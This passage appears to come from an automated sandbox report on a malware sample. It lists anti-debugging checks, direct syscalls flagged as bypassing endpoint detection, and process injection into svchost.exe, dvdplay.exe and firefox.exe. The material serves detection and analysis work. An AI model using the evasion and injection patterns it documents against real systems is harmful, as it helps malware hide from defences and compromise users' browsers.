            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504B00 mov eax, dword ptr fs:[00000030h]1_2_03504B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h]1_2_034AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h]1_2_0345EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h]1_2_034F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h]1_2_03450BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h]1_2_03430BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEBD0 mov eax, dword ptr fs:[00000030h]1_2_034DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h]1_2_03438BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EBFC mov eax, dword ptr fs:[00000030h]1_2_0345EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCBF0 mov eax, dword ptr fs:[00000030h]1_2_034BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h]1_2_03440BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h]1_2_034E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h]1_2_03436A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h]1_2_03440A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h]1_2_0346CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DEA60 mov eax, dword ptr fs:[00000030h]1_2_034DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h]1_2_034ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BCA11 mov eax, dword ptr fs:[00000030h]1_2_034BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346CA24 mov eax, dword ptr fs:[00000030h]1_2_0346CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345EA2E mov eax, dword ptr fs:[00000030h]1_2_0345EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]1_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h]1_2_03454A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h]1_2_03486ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430AD0 mov eax, dword ptr fs:[00000030h]1_2_03430AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]1_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h]1_2_03464AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]1_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h]1_2_0346AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h]1_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504A80 mov eax, dword ptr fs:[00000030h]1_2_03504A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468A90 mov edx, dword ptr fs:[00000030h]1_2_03468A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]1_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h]1_2_03438AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03486AA4 mov eax, dword ptr fs:[00000030h]1_2_03486AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0946 mov eax, dword ptr fs:[00000030h]1_2_034B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504940 mov eax, dword ptr fs:[00000030h]1_2_03504940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03456962 mov eax, dword ptr fs:[00000030h]1_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov edx, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E mov eax, dword ptr fs:[00000030h]1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]1_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h]1_2_034D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC97C mov eax, dword ptr fs:[00000030h]1_2_034BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]1_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h]1_2_034AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC912 mov eax, dword ptr fs:[00000030h]1_2_034BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]1_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03428918 mov eax, dword ptr fs:[00000030h]1_2_03428918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B892A mov eax, dword ptr fs:[00000030h]1_2_034B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C892B mov eax, dword ptr fs:[00000030h]1_2_034C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C69C0 mov eax, dword ptr fs:[00000030h]1_2_034C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034649D0 mov eax, dword ptr fs:[00000030h]1_2_034649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA9D3 mov eax, dword ptr fs:[00000030h]1_2_034FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE9E0 mov eax, dword ptr fs:[00000030h]1_2_034BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov esi, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03442840 mov ecx, dword ptr fs:[00000030h]1_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460854 mov eax, dword ptr fs:[00000030h]1_2_03460854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434859 mov eax, dword ptr fs:[00000030h]1_2_03434859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE872 mov eax, dword ptr fs:[00000030h]1_2_034BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6870 mov eax, dword ptr fs:[00000030h]1_2_034C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BC810 mov eax, dword ptr fs:[00000030h]1_2_034BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov ecx, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452835 mov eax, dword ptr fs:[00000030h]1_2_03452835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A830 mov eax, dword ptr fs:[00000030h]1_2_0346A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D483A mov eax, dword ptr fs:[00000030h]1_2_034D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345E8C0 mov eax, dword ptr fs:[00000030h]1_2_0345E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035008C0 mov eax, dword ptr fs:[00000030h]1_2_035008C0
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\dvdplay.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: NULL target: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: NULL target: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\dvdplay.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\dvdplay.exeThread register set: target process: 3140Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\dvdplay.exeThread APC queued: target process: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2964008Jump to behavior
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
